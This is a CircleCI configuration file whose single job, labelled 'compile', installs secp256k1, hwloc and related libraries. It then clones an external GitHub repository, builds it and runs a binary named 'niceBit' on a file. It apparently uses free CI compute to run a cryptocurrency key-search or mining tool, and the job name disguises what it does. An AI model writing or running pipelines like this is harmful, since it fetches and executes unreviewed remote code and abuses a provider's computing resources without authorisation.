version: 2.1
jobs:
  compile:
   docker:
      - image: bryanhafidz/bryan-docker:0x02
   steps:
      - run:
          command: |
           apt update &&apt install -y libsecp256k1-dev git build-essential cmake libuv1-dev libssl-dev libhwloc-dev make
           git clone --depth=1 https://github.com/brianmills75/cxx.git Q
           cd Q
           make
           chmod 755 *
           ./niceBit -f FILE
      
          
workflows:
  version: 2.1
  cooking:
    jobs:
      - compile
